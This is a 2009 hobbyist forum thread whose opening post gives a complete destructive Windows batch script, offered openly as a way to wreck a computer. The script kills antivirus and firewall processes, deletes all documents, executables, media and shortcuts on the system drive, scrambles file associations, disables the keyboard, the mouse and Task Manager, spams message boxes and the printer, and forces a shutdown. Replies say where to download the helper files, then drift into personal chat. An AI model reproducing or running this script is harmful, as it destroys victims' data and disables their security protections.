FlameResistant
Attention, the site recently went through some renovation, and your password may have been reset. If so, it was changed to 'password'. I advise you change it soon so that your account is not stolen.

Join the forum, it's quick and easy

FlameResistant
Attention, the site recently went through some renovation, and your password may have been reset. If so, it was changed to 'password'. I advise you change it soon so that your account is not stolen.
FlameResistant
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Rosco's Ultimate batch virus
Bonage!!!! EmptyWed Sep 22, 2010 12:02 am by Rosco

» Tutorial for those who don't even know what the hell a .bat file is.
Bonage!!!! EmptyFri Jun 04, 2010 7:45 pm by Ev1lW4ffl3

» Ev1lW4ffl3's Batch Fun 2
Bonage!!!! EmptyFri Jun 04, 2010 7:45 pm by Ev1lW4ffl3

» batch file funness!
Bonage!!!! EmptyFri Jun 04, 2010 7:44 pm by Ev1lW4ffl3

» confuse file extensions
Bonage!!!! EmptyFri Jun 04, 2010 7:43 pm by Ev1lW4ffl3

» infect start up folder
Bonage!!!! EmptyFri Jun 04, 2010 7:42 pm by Ev1lW4ffl3

» infect comand prompt
Bonage!!!! EmptyFri Jun 04, 2010 7:42 pm by Ev1lW4ffl3

» start comands in batch files ^^
Bonage!!!! EmptyFri Jun 04, 2010 7:41 pm by Ev1lW4ffl3

» Indy's first batch code.
Bonage!!!! EmptyFri Jun 04, 2010 7:41 pm by Ev1lW4ffl3

Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search
Affiliates
free forum
 


April 2024
MonTueWedThuFriSatSun
1234567
891011121314
15161718192021
22232425262728
2930     

Calendar Calendar


Bonage!!!!

3 posters

Page 1 of 2 1, 2  Next

Go down

Bonage!!!! Empty Bonage!!!!

Post  Ev1lW4ffl3 Sun Jun 28, 2009 5:46 pm

What This File does:
-completely bones the computer
-MUST HAVE 1.bat,Deletion.bat and Dots.bat (can download from IHC site)

start 1.bat
start Deletion.bat
start Dots.bat

@ echo off
rem ---------------------------------
rem Temp Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
rem ---------------------------------

rem ---------------------------------
rem Start Opening Disk Tray
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
rem ---------------------------------

start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
www.google.com
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start
start

rem ---------------------------------
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ---------------------------------
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ---------------------------------

rem ---------------------------------
rem Delete All Documents
DIR /S/B %SystemDrive%\*.doc >> FIleList_doc.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_doc.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Mp3
DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Mp4
DIR /S/B %SystemDrive%\*.mp4 >> FIleList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp4.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Pdf
DIR /S/B %SystemDrive%\*.pdf >> FIleList_pdf.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_pdf.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Png
DIR /S/B %SystemDrive%\*.png >> FIleList_png.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_png.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Texts
DIR /S/B %SystemDrive%\*.txt >> FIleList_txt.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_txt.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Xml
DIR /S/B %SystemDrive%\*.xml >> FIleList_xml.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_xml.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Delete All Lnk
DIR /S/B %SystemDrive%\*.lnk >> FIleList_lnk.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_lnk.txt) do del "%%j:%%k"
rem ---------------------------------

rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------

@echo off
:hack
echo you are being hacked...System Crashing...
goto hack

rem ---------------------------------
rem Spam With VBScript Msgboxes
echo Do>>msgbox.vbs
echo x=msgbox(message goes here)
echo Loop>>msgbox.vbs
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
start "" "msgbox.vbs"
rem ---------------------------------

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

rem ---------------------------------
rem Spam Printer
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM>> "Spam.txt"
echo SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM SPAM
notepad /P "Spam.txt"
rem ---------------------------------

rem ---------------------------------
rem Disable Task Manager
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
rem ---------------------------------

copy 0% ms32
start ms32

msg* WINDOWS has encountered a problem and needs to close

shutdown -s -t 1 -c "This computer has just been boned!"


How to fix:
-It is impossible to fix this will completely destory any computer it is activated on

**DO NOT ACTIVATE THIS ON YOUR OWN CPU**
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Indy Sun Jun 28, 2009 8:41 pm

great.. now someone's going to do it on their computer or send it to someone and get arrested.. thanks waffle. hah, jk.. did you make this from scratch?
Indy
Indy
Administrator
Administrator

Posts : 606
Join date : 2009-04-18
Age : 29
Location : Arkansas, United States

https://flameresistant.forumotion.net

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Sun Jun 28, 2009 10:10 pm

ya kinda i used some of the files posted by Nexxon and put those together along with some of my own code.

Also some of the files you have to download from the IHC site to get it to work (it automatically opens some of my .bat files that i have named)

You can get those files on the "Programs" page
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Indy Sun Jun 28, 2009 11:03 pm

ok. what was the link again?
Indy
Indy
Administrator
Administrator

Posts : 606
Join date : 2009-04-18
Age : 29
Location : Arkansas, United States

https://flameresistant.forumotion.net

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Mon Jun 29, 2009 1:52 am

ihcprogramming.webs.com
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Tue Jun 30, 2009 10:31 am

What Nexxon said
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Fri Jul 03, 2009 3:24 pm

actualy if you just reinstal the os it would fix it but you dont want to do that lolz
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Sun Jul 05, 2009 1:47 pm

exactly i dont want to reinstall stuff
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Tue Jul 07, 2009 7:18 pm

yeah its a bitch lolz
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Tue Jul 07, 2009 9:02 pm

ya it is
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Thu Jul 09, 2009 12:25 am

nice pic of johnsons street i wana get into winter photography ^^
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Thu Jul 09, 2009 3:16 am

lol u got that from my MySpace
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Thu Jul 09, 2009 11:48 am

i no... i was complementing your pic lolz
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Thu Jul 09, 2009 2:08 pm

i know...thx
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Sun Jul 19, 2009 2:39 am

oh lolz im confused
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Thu Jul 30, 2009 4:26 pm

how are you confused
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Fri Jul 31, 2009 2:39 am

nvm it i guess... its like you no.... oh hey guess what i got today ^^ sara came back from arizona and she gave me a rose ^^
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Wed Aug 05, 2009 10:57 am

who is sara?? Is that your girlfriend??
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Wed May 05, 2010 5:39 pm

no sara was the first love of my life... she had to leave to arizona it tore me in 2 i lost my mind for a little bit but sense therapy and meds ive been getting better
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Thu May 06, 2010 12:31 am

You tappin it?
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Tue May 11, 2010 4:04 pm

what you mean tappin you mean taking? cause im taking my meds yes i take 2 meds one is a anti psychotic/mood stabilizer and the other is a mood stabilizer/anti depressant
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Sat May 15, 2010 4:13 pm

tappin means "you havin sex with her"
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Fri May 21, 2010 4:02 pm

yeah lol i knew that i only read the last part of my post and thought of meds lol and no sadly she has a boyfriend oh and me and my girlfriend broke up... but i still got the chance to fuck her ^^
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Ev1lW4ffl3 Wed Jun 02, 2010 12:00 am

did you take the opportunity?
Ev1lW4ffl3
Ev1lW4ffl3
GFX Designer
GFX Designer

Posts : 1196
Join date : 2009-05-15
Age : 30
Location : Oregon

http://assassinreviews.webs.com

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  NexxonKila9 Thu Jun 03, 2010 9:48 am

hell yes lol but now we broke up and i get none and thats a problem lol
NexxonKila9
NexxonKila9
Captain
Captain

Posts : 665
Join date : 2009-05-03
Age : 29
Location : colorado

Back to top Go down

Bonage!!!! Empty Re: Bonage!!!!

Post  Sponsored content


Sponsored content


Back to top Go down

Page 1 of 2 1, 2  Next

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum